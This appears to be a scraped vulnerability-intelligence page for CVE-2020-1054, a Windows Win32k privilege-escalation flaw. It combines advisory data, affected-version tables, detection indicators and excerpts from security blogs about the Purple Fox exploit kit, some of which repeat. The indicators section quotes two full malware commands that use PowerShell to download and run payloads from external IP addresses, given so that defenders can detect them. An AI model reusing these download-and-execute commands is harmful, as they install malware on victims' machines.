CVE-2020-1054
published 2020-05-21CVE-2020-1054: An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory, aka 'Win32k Elevation…
PriorityP184high7.8CVSS 3.1
AVLACLPRLUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-05-03
Exploited in the wild
EPSS
52.78%
98.9th percentile
An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1143.
Affected
65 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows | — | — |
| microsoft | windows | — | — |
| microsoft | windows | — | — |
| microsoft | windows | — | — |
| microsoft | windows | — | — |
| microsoft | windows | — | — |
| microsoft | windows | — | — |
| microsoft | windows | — | — |
| microsoft | windows | — | — |
| microsoft | windows | — | — |
| microsoft | windows | — | — |
| microsoft | windows | — | — |
| microsoft | windows | — | — |
| microsoft | windows | — | — |
| microsoft | windows | — | — |
| microsoft | windows | — | — |
| microsoft | windows | — | — |
| microsoft | windows | — | — |
| microsoft | windows_10 | — | — |
| microsoft | windows_10 | — | — |
| microsoft | windows_10 | — | — |
| microsoft | windows_10 | — | — |
| microsoft | windows_10 | — | — |
| microsoft | windows_10 | — | — |
| microsoft | windows_10_version_1903_for_32-bit_systems | — | — |
Detection & IOCsextracted from sources · hover to see the quote
command"cmd.exe" /c powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('hxxp[[:]]//103.228.112.246[[:]]17881/57BC9B7E.Png');MsiMake hxxp[[:]]//103.228.112.246[[:]]17881/0CFA042F.Png"↗
command"cmd.exe" /c powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http[:]//117.187.136.141[:]13405/57BC9B7E.Png');MsiMake http[:]//117.187.136.141[:]13405/0CFA042F.Png"↗
- →CVE-2020-1054 is exploited by PurpleFox EK targeting Windows 7/Windows Server 2008 systems. Detect by monitoring for absence of hotfixes KB4556836 or KB4556843 combined with exploit-chain PowerShell activity. ↗
- →PurpleFox uses PowerShell with '-nop -exec bypass' and IEX DownloadString to fetch and execute payloads named as .Png files (e.g., 57BC9B7E.Png, 0CFA042F.Png) followed by MsiMake command — alert on this pattern. ↗
- →PurpleFox MSI package drops malicious files named dbcode21mk.log and setupact64.log to the Windows directory and replaces sens.dll — monitor for unexpected writes to C:\Windows\system32\sens.dll and C:\Windows\AppPatch\Acpsens.dll. ↗
- →PurpleFox sets PendingFileRenameOperations under HKLM\SYSTEM\CurrentControlSet\Control\Session Manager to replace sens.dll on reboot — monitor this registry key for suspicious rename entries pointing to non-standard files. ↗
- →PurpleFox creates a Windows firewall rule to block incoming connections on ports 135, 139, and 445 via a .vbs script — alert on firewall rule creation blocking these ports from non-administrative processes. ↗
- →PurpleFox WPAD attack delivers CVE-2019-1367 JavaScript exploit via http://wpad[.]id/wpad[.]dat — monitor DNS and HTTP traffic for requests to wpad.id. ↗
- →PurpleFox FoxSocket backdoor uses WebSocket keepalive messages and ECDH key exchange with an initial AES-encrypted message of fixed length 176 bytes — network signatures can target this fixed-length first WebSocket message. ↗
- →PurpleFox removes old installation registry keys matching HKLM\SYSTEM\CurrentControlSet\Services\{ac00-ac10} — hunt for service keys in this hex range as indicators of prior or active PurpleFox infection. ↗
- ·CVE-2020-1054 is only targeted against Windows 7 / Windows Server 2008 systems in the PurpleFox exploit chain; the script checks for the absence of KB4556836 or KB4556843 before selecting this exploit. ↗
- ·All C2 domain resolution and payload delivery is proxied through Cloudflare, making IP-based blocking of the C2 infrastructure unreliable. ↗
CVSS provenance
nvdv3.17.8HIGHCVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
vulncheck7.8HIGH
cisa7.8HIGH
vendor_msrc7.0HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-pr55-m2r8-wvg6: An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory, aka 'Win32k
ghsa_unreviewed·2022-05-24·CVSS 7.8
CVE-2020-1143 [HIGH] CWE-269 GHSA-pr55-m2r8-wvg6: An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory, aka 'Win32k
An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1054.
GHSA
GHSA-5qfv-hvxp-fg32: An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory, aka 'Win32k
ghsa_unreviewed·2022-05-24·CVSS 7.8
CVE-2020-1054 [HIGH] CWE-269 GHSA-5qfv-hvxp-fg32: An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory, aka 'Win32k
An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1143.
VulnCheck
Microsoft Win32k Privilege Escalation Vulnerability
vulncheck·2020·CVSS 7.8
CVE-2020-1054 [HIGH] CWE-787 Microsoft Win32k Privilege Escalation Vulnerability
Microsoft Win32k Privilege Escalation Vulnerability
Microsoft Win32k contains a privilege escalation vulnerability when the Windows kernel-mode driver fails to properly handle objects in memory. Successful exploitation allows an attacker to execute code in kernel mode.
Affected: Microsoft Win32k
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.sentinelone.com/labs/purple-fox-ek-new-cves-steganography-and-virtualization-added-to-attack-flow/; https://threatresearch.ext.hp.com/purple-fox-exploit-kit-now-exploits-cve-2021-26411/; https://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://decoded.avast.io/janvojt
CISA
Microsoft Win32k Privilege Escalation Vulnerability
cisa·2021-11-03·CVSS 7.8
CVE-2020-1054 [HIGH] CWE-787 Microsoft Win32k Privilege Escalation Vulnerability
Vulnerability: Microsoft Win32k Privilege Escalation Vulnerability
Affected: Microsoft Win32k
Microsoft Win32k contains a privilege escalation vulnerability when the Windows kernel-mode driver fails to properly handle objects in memory. Successful exploitation allows an attacker to execute code in kernel mode.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2020-1054
Remediation Due Date: 2022-05-03
Microsoft
Win32k Elevation of Privilege Vulnerability
vendor_msrc·2020-05-12·CVSS 7.0
CVE-2020-1054 [HIGH] Win32k Elevation of Privilege Vulnerability
Win32k Elevation of Privilege Vulnerability
Description: An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.
To exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system.
The update addresses this vulnerability by correcting how the Windows kernel-mode driver handles objects in memory.
Microsoft Graphics Component: Microsoft Graphics C
No detection rules found.
Checkpoint
24th April – Threat Intelligence Report
blogs_checkpoint·2023-04-24
CVE-2023-20036 24th April – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 24th April – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 24th April, please download our Threat_Intelligence Bulletin
TOP ATTACKS AND BREACHES
The American Bar Association (ABA), the largest global association of lawyers and legal professionals, has suffered a data breach with hackers gaining access to older credentials of 1,466,000 members. The breach was first detected on March 17th, 2023, and involved login credentials and salted passwords to ABA’s old website
Cap
Checkpoint
Raspberry Robin: Anti-Evasion How-To & Exploit Analysis
blogs_checkpoint·2023-04-18
CVE-2020-1054 Raspberry Robin: Anti-Evasion How-To & Exploit Analysis
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
AI Research 2
Android Malware 23
Artificial Intelligence 4
ChatGPT 3
Check Point Research Publications 455
Cloud Security 1
CPRadio 44
Crypto 2
Data & Threat Intelligence 2
Data Analysis 0
Demos 22
Global Cyber Attack Reports 408
How To Guides 13
Ransomware 5
Russo-Ukrainian War 1
Security Report 1
Threat and data analysis 0
Threat Research 174
Web 3.0 Security 11
Wipers 0
## Raspberry Robin: Anti-Evasion How-To & Exploit Analysis
Research by: Shavit Yosef
## Introduction
During the last year, Raspberry Robin has evolved to be one of the most distributed ma
Qualys
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
blogs_qualys·2022-02-23
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
#### Table of Contents
- Situation
- Directive Scope
- CISA Catalog of Known Exploited Vulnerabilities
- Detect CISA Vulnerabilities Using Qualys VMDR
- CISA Exploited RTI
- Detailed Operational Dashboard
- Remediation
- Federal Enterprises and Agencies Can Act Now
- Summary
- Getting Started
CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively.
## Situation
Last November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a Binding Operational Directiv
Trendmicro
PurpleFox Adds New Backdoor That Uses WebSockets
blogs_trendmicro·2021-10-19·CVSS 7.8
CVE-2021-1732 [HIGH] PurpleFox Adds New Backdoor That Uses WebSockets
Ciberamenazas
## PurpleFox Adds New Backdoor That Uses WebSockets
In September 2021, the Trend Micro Managed XDR (MDR) team looked into suspicious activity related to a PurpleFox operator. Our findings led us to investigate an updated PurpleFox arsenal, which included an added vulnerability (CVE-2021-1732) and optimized rootkit capabilities leveraged in their attacks.
By: Abdelrhman Sharshar, Jay Yaneza, Sherif Magdy Oct 19, 2021 Read time: ( words)
Save to Folio
In September 2021, the Trend Micro Managed XDR (MDR) team looked into suspicious activity related to a PurpleFox operator. Our findings led us to investigate an updated PurpleFox arsenal, which included an added vulnerability (CVE-2021-1732) and optimized rootkit capabilities leveraged in their attacks.
We also found a new b
Trendmicro
PurpleFox Adds New Backdoor That Uses WebSockets
blogs_trendmicro·2021-10-19·CVSS 7.8
CVE-2021-1732 [HIGH] PurpleFox Adds New Backdoor That Uses WebSockets
Cyber Threats
## PurpleFox Adds New Backdoor That Uses WebSockets
In September 2021, the Trend Micro Managed XDR (MDR) team looked into suspicious activity related to a PurpleFox operator. Our findings led us to investigate an updated PurpleFox arsenal, which included an added vulnerability (CVE-2021-1732) and optimized rootkit capabilities leveraged in their attacks.
By: Abdelrhman Sharshar, Jay Yaneza, Sherif Magdy 2021/10/19 Read time: ( words)
Save to Folio
In September 2021, the Trend Micro Managed XDR (MDR) team looked into suspicious activity related to a PurpleFox operator. Our findings led us to investigate an updated PurpleFox arsenal, which included an added vulnerability (CVE-2021-1732) and optimized rootkit capabilities leveraged in their attacks.
We also found a new bac
Trendmicro
PurpleFox Adds New Backdoor That Uses WebSockets
blogs_trendmicro·2021-10-19·CVSS 7.8
CVE-2021-1732 [HIGH] PurpleFox Adds New Backdoor That Uses WebSockets
Cyber Threats
# PurpleFox Adds New Backdoor That Uses WebSockets
In September 2021, the Trend Micro Managed XDR (MDR) team looked into suspicious activity related to a PurpleFox operator. Our findings led us to investigate an updated PurpleFox arsenal, which included an added vulnerability (CVE-2021-1732) and optimized rootkit capabilities leveraged in their attacks.
By: Abdelrhman Sharshar, Jay Yaneza, Sherif Magdy
2021/10/19
Read time: ( words)
Save to Folio
In September 2021, the Trend Micro Managed XDR (MDR) team looked into suspicious activity related to a PurpleFox operator. Our findings led us to investigate an updated PurpleFox arsenal, which included an added vulnerability (CVE-2021-1732) and optimized rootkit capabilities leveraged in their attacks.
We also found a new bac
Trendmicro
PurpleFox Adds New Backdoor That Uses WebSockets
blogs_trendmicro·2021-10-19·CVSS 7.8
CVE-2021-1732 [HIGH] PurpleFox Adds New Backdoor That Uses WebSockets
Cyber Threats
## PurpleFox Adds New Backdoor That Uses WebSockets
In September 2021, the Trend Micro Managed XDR (MDR) team looked into suspicious activity related to a PurpleFox operator. Our findings led us to investigate an updated PurpleFox arsenal, which included an added vulnerability (CVE-2021-1732) and optimized rootkit capabilities leveraged in their attacks.
By: Abdelrhman Sharshar, Jay Yaneza, Sherif Magdy Oct 19, 2021 Read time: ( words)
Save to Folio
In September 2021, the Trend Micro Managed XDR (MDR) team looked into suspicious activity related to a PurpleFox operator. Our findings led us to investigate an updated PurpleFox arsenal, which included an added vulnerability (CVE-2021-1732) and optimized rootkit capabilities leveraged in their attacks.
We also found a new b
Trendmicro
PurpleFox Adds New Backdoor That Uses WebSockets
blogs_trendmicro·2021-10-19·CVSS 7.8
CVE-2021-1732 [HIGH] PurpleFox Adds New Backdoor That Uses WebSockets
Cyberbedrohungen
## PurpleFox Adds New Backdoor That Uses WebSockets
In September 2021, the Trend Micro Managed XDR (MDR) team looked into suspicious activity related to a PurpleFox operator. Our findings led us to investigate an updated PurpleFox arsenal, which included an added vulnerability (CVE-2021-1732) and optimized rootkit capabilities leveraged in their attacks.
By: Abdelrhman Sharshar, Jay Yaneza, Sherif Magdy Oct 19, 2021 Read time: ( words)
Save to Folio
In September 2021, the Trend Micro Managed XDR (MDR) team looked into suspicious activity related to a PurpleFox operator. Our findings led us to investigate an updated PurpleFox arsenal, which included an added vulnerability (CVE-2021-1732) and optimized rootkit capabilities leveraged in their attacks.
We also found a ne
Trendmicro
PurpleFox Using WPAD to Target Indonesian Users
blogs_trendmicro·2021-07-01·CVSS 7.5
[HIGH] PurpleFox Using WPAD to Target Indonesian Users
Cyber Threats
## PurpleFox Using WPAD to Target Indonesian Users
The PurpleFox Exploit Kit is now being distributed via WPAD attacks targeting Indonesian users.
By: Trend Micro Jul 01, 2021 Read time: ( words)
Save to Folio
In September 2020, we published a blog describing how the PurpleFox Exploit Kit used Cloudflare services to maintain an infrastructure resilient to blocking and detection attempts. Since then, PurpleFox has been maintaining this strategy while at same time improving its attack chain by incorporating the latest public vulnerabilities into its arsenal.
Recently, we found that PurpleFox added a very old tactic to increase its delivering performance. This time PurpleFox EK is making use of WPAD domains to infect users. While a WPAD abuse attack is a technique that has
Trendmicro
PurpleFox Using WPAD to Target Indonesian Users
blogs_trendmicro·2021-07-01·CVSS 7.5
[HIGH] PurpleFox Using WPAD to Target Indonesian Users
Cyber Threats
## PurpleFox Using WPAD to Target Indonesian Users
The PurpleFox Exploit Kit is now being distributed via WPAD attacks targeting Indonesian users.
By: Trend Micro 2021/07/01 Read time: ( words)
Save to Folio
In September 2020, we published a blog describing how the PurpleFox Exploit Kit used Cloudflare services to maintain an infrastructure resilient to blocking and detection attempts. Since then, PurpleFox has been maintaining this strategy while at same time improving its attack chain by incorporating the latest public vulnerabilities into its arsenal.
Recently, we found that PurpleFox added a very old tactic to increase its delivering performance. This time PurpleFox EK is making use of WPAD domains to infect users. While a WPAD abuse attack is a technique that has b
Trendmicro
PurpleFox Using WPAD to Target Indonesian Users
blogs_trendmicro·2021-07-01·CVSS 7.5
[HIGH] PurpleFox Using WPAD to Target Indonesian Users
Minacce cyber
## PurpleFox Using WPAD to Target Indonesian Users
The PurpleFox Exploit Kit is now being distributed via WPAD attacks targeting Indonesian users.
By: Trend Micro Jul 01, 2021 Read time: ( words)
Save to Folio
In September 2020, we published a blog describing how the PurpleFox Exploit Kit used Cloudflare services to maintain an infrastructure resilient to blocking and detection attempts. Since then, PurpleFox has been maintaining this strategy while at same time improving its attack chain by incorporating the latest public vulnerabilities into its arsenal.
Recently, we found that PurpleFox added a very old tactic to increase its delivering performance. This time PurpleFox EK is making use of WPAD domains to infect users. While a WPAD abuse attack is a technique that has
Trendmicro
PurpleFox Using WPAD to Target Indonesian Users
blogs_trendmicro·2021-07-01·CVSS 7.5
[HIGH] PurpleFox Using WPAD to Target Indonesian Users
Ciberamenazas
## PurpleFox Using WPAD to Target Indonesian Users
The PurpleFox Exploit Kit is now being distributed via WPAD attacks targeting Indonesian users.
By: Trend Micro Jul 01, 2021 Read time: ( words)
Save to Folio
In September 2020, we published a blog describing how the PurpleFox Exploit Kit used Cloudflare services to maintain an infrastructure resilient to blocking and detection attempts. Since then, PurpleFox has been maintaining this strategy while at same time improving its attack chain by incorporating the latest public vulnerabilities into its arsenal.
Recently, we found that PurpleFox added a very old tactic to increase its delivering performance. This time PurpleFox EK is making use of WPAD domains to infect users. While a WPAD abuse attack is a technique that has
Trendmicro
PurpleFox Using WPAD to Target Indonesian Users
blogs_trendmicro·2021-07-01·CVSS 7.5
[HIGH] PurpleFox Using WPAD to Target Indonesian Users
Cyber Threats
# PurpleFox Using WPAD to Target Indonesian Users
The PurpleFox Exploit Kit is now being distributed via WPAD attacks targeting Indonesian users.
By: Trend Micro
2021/07/01
Read time: ( words)
Save to Folio
In September 2020, we published a blog describing how the PurpleFox Exploit Kit used Cloudflare services to maintain an infrastructure resilient to blocking and detection attempts. Since then, PurpleFox has been maintaining this strategy while at same time improving its attack chain by incorporating the latest public vulnerabilities into its arsenal.
Recently, we found that PurpleFox added a very old tactic to increase its delivering performance. This time PurpleFox EK is making use of WPAD domains to infect users. While a WPAD abuse attack is a technique that has b
Trendmicro
PurpleFox Using WPAD to Target Indonesian Users
blogs_trendmicro·2021-07-01·CVSS 7.5
[HIGH] PurpleFox Using WPAD to Target Indonesian Users
Cyber Threats
## PurpleFox Using WPAD to Target Indonesian Users
The PurpleFox Exploit Kit is now being distributed via WPAD attacks targeting Indonesian users.
By: Trend Micro Jul 01, 2021 Read time: ( words)
Save to Folio
In September 2020, we published a blog describing how the PurpleFox Exploit Kit used Cloudflare services to maintain an infrastructure resilient to blocking and detection attempts. Since then, PurpleFox has been maintaining this strategy while at same time improving its attack chain by incorporating the latest public vulnerabilities into its arsenal.
Recently, we found that PurpleFox added a very old tactic to increase its delivering performance. This time PurpleFox EK is making use of WPAD domains to infect users. While a WPAD abuse attack is a technique that has
Trendmicro
PurpleFox Using WPAD to Target Indonesian Users
blogs_trendmicro·2021-07-01·CVSS 7.5
[HIGH] PurpleFox Using WPAD to Target Indonesian Users
Cyberbedrohungen
## PurpleFox Using WPAD to Target Indonesian Users
The PurpleFox Exploit Kit is now being distributed via WPAD attacks targeting Indonesian users.
By: Trend Micro Jul 01, 2021 Read time: ( words)
Save to Folio
In September 2020, we published a blog describing how the PurpleFox Exploit Kit used Cloudflare services to maintain an infrastructure resilient to blocking and detection attempts. Since then, PurpleFox has been maintaining this strategy while at same time improving its attack chain by incorporating the latest public vulnerabilities into its arsenal.
Recently, we found that PurpleFox added a very old tactic to increase its delivering performance. This time PurpleFox EK is making use of WPAD domains to infect users. While a WPAD abuse attack is a technique that
Sentinelone
Purple Fox EK | New CVEs, Steganography, and Virtualization Added to Attack Flow - SentinelLabs
blogs_sentinelone·2020-10-19·CVSS 7.8
CVE-2020-1054 [HIGH] Purple Fox EK | New CVEs, Steganography, and Virtualization Added to Attack Flow - SentinelLabs
## Executive Summary
- In recent weeks, we have seen a spike in the number of attempts to attack vulnerable versions of Internet Explorer by actors leveraging the Purple Fox exploit kit.
- Our investigations reveal that Purple Fox has iterated to include use of two recent CVEs – CVE-2020-1054 and CVE-2019-0808 – through publicly-available exploit code.
- In addition, we’ve noticed other changes to their attack flow that allow them to better circumvent firewall protections and some detection tools by adopting steganography and obscuring malicious code with code virtualization technologies.
During the last couple of years, Purple Fox has advanced its attack and delivery methods. First observed in September 2018, subsequent researchers noted that in 2019 Purple Fox dropped use of NSIS (Null
Sentinelone
Purple Fox EK | New CVEs, Steganography, and Virtualization Added to Attack Flow
blogs_sentinelone·2020-10-19·CVSS 7.8
CVE-2020-1054 [HIGH] Purple Fox EK | New CVEs, Steganography, and Virtualization Added to Attack Flow
## Purple Fox EK | New CVEs, Steganography, and Virtualization Added to Attack Flow
## Executive Summary
In recent weeks, we have seen a spike in the number of attempts to attack vulnerable versions of Internet Explorer by actors leveraging the Purple Fox exploit kit.
Our investigations reveal that Purple Fox has iterated to include use of two recent CVEs – CVE-2020-1054 and CVE-2019-0808 – through publicly-available exploit code.
In addition, we’ve noticed other changes to their attack flow that allow them to better circumvent firewall protections and some detection tools by adopting steganography and obscuring malicious code with code virtualization technologies.
During the last couple of years, Purple Fox has advanced its attack and delivery methods. First observed in September 201
Tenable
Microsoft’s May 2020 Patch Tuesday Addresses 111 CVEs
blogs_tenable·2020-05-12
Microsoft’s May 2020 Patch Tuesday Addresses 111 CVEs
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Talos
Microsoft Patch Tuesday — May 2020: Vulnerability disclosures and Snort coverage
blogs_talos·2020-05-12·CVSS 9.8
[CRITICAL] Microsoft Patch Tuesday — May 2020: Vulnerability disclosures and Snort coverage
## Microsoft Patch Tuesday — May 2020: Vulnerability disclosures and Snort coverage
By Jon Munshaw.
Microsoft released its monthly security update today, disclosing vulnerabilities across many of its products and releasing corresponding updates. This month's Patch Tuesday covers 111 vulnerabilities. Fifteen of the flaws Microsoft disclosed are considered critical. There are also 95 "important" vulnerabilities and six low- and moderate-severity vulnerabilities each.
Cisco Talos specifically disclosed CVE-2020-0901 , a code execution vulnerability in Excel. This month’s security update also covers security issues in a variety of Microsoft services and software, including SharePoint, Media Foundation and the Chakra scripting engine.
Talos also released a new set of SNORTⓇ rules that provi
Talos
Microsoft Patch Tuesday — May 2020: Vulnerability disclosures and Snort coverage
blogs_talos·2020-05-12·CVSS 9.8
CVE-2020-0901 [CRITICAL] Microsoft Patch Tuesday — May 2020: Vulnerability disclosures and Snort coverage
By Jon Munshaw.
Microsoft released its monthly security update today, disclosing vulnerabilities across many of its products and releasing corresponding updates. This month's Patch Tuesday covers 111 vulnerabilities. Fifteen of the flaws Microsoft disclosed are considered critical. There are also 95 "important" vulnerabilities and six low- and moderate-severity vulnerabilities each.
Cisco Talos specifically disclosed CVE-2020-0901, a code execution vulnerability in Excel. This month’s security update also covers security issues in a variety of Microsoft services and software, including SharePoint, Media Foundation and the Chakra scripting engine.
Talos also released a new set of SNORTⓇ rules that provide coverage for some of these vulnerabilities. For more, check out the full Snort rule
Krebs
Microsoft Patch Tuesday, May 2020 Edition
blogs_krebs·2020-05-12·CVSS 8.8
[HIGH] Microsoft Patch Tuesday, May 2020 Edition
Microsoft today issued software updates to plug at least 111 security holes in Windows and Windows-based programs. None of the vulnerabilities were labeled as being publicly exploited or detailed prior to today, but as always if you’re running Windows on any of your machines it’s time once again to prepare to get your patches on.
May marks the third month in a row that Microsoft has pushed out fixes for more than 110 security flaws in its operating system and related software. At least 16 of the bugs are labeled “Critical,” meaning ne’er-do-wells can exploit them to install malware or seize remote control over vulnerable systems with little or no help from users.
But focusing solely on Microsoft’s severity ratings may obscure the seriousness of the flaws being addressed this month. Todd
Krebs
Microsoft Patch Tuesday, May 2020 Edition
blogs_krebs·2020-05-12·CVSS 7.8
[HIGH] Microsoft Patch Tuesday, May 2020 Edition
Microsoft today issued software updates to plug at least 111 security holes in Windows and Windows-based programs. None of the vulnerabilities were labeled as being publicly exploited or detailed prior to today, but as always if you’re running Windows on any of your machines it’s time once again to prepare to get your patches on.
But focusing solely on Microsoft’s severity ratings may obscure the seriousness of the flaws being addressed this month. Todd Schell, senior product manager at security vendor Ivanti, notes that if one looks at the “exploitability assessment” tied to each patch — i.e., how likely Microsoft considers each can and will be exploited for nefarious purposes — it makes sense to pay just as much attention to the vulnerabilities Microsoft has labeled with the lesser seve
Zscaler
Zscaler found New Security Vulnerabilities | 5-13-2020
blogs_zscaler·CVSS 7.5
[HIGH] Zscaler found New Security Vulnerabilities | 5-13-2020
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Bugzilla
CVE-2018-10805 ImageMagick: Memory leak in ReadYCBCRImage
bugzilla·2018-05-11·CVSS 6.5
CVE-2018-10805 [MEDIUM] CVE-2018-10805 ImageMagick: Memory leak in ReadYCBCRImage
CVE-2018-10805 ImageMagick: Memory leak in ReadYCBCRImage
A flaw was found in ImageMagick version 7.0.7-28 contains a memory leak in ReadYCBCRImage in coders/ycbcr.c.
References:
https://github.com/ImageMagick/ImageMagick/issues/1054
Discussion:
Created ImageMagick tracking bugs for this issue:
Affects: fedora-all [bug 1577400]
---
Doesn't look like it's leaking canvas_image but definitely leaking quantum_info.
---
This issue has been addressed in the following products:
Red Hat Enterprise Linux 7
Via RHSA-2020:1180 https://access.redhat.com/errata/RHSA-2020:1180
---
This bug is now closed. Further updates for individual products will be reflected on the CVE page(s):
https://access.redhat.com/security/cve/cve-2018-10805
http://packetstormsecurity.com/files/160515/Microsoft-Windows-DrawIconEx-Local-Privilege-Escalation.htmlhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1054http://packetstormsecurity.com/files/160515/Microsoft-Windows-DrawIconEx-Local-Privilege-Escalation.htmlhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1054https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-1054
2020-05-21
Published
2021-11-03
Added to CISA KEV
Exploited in the wild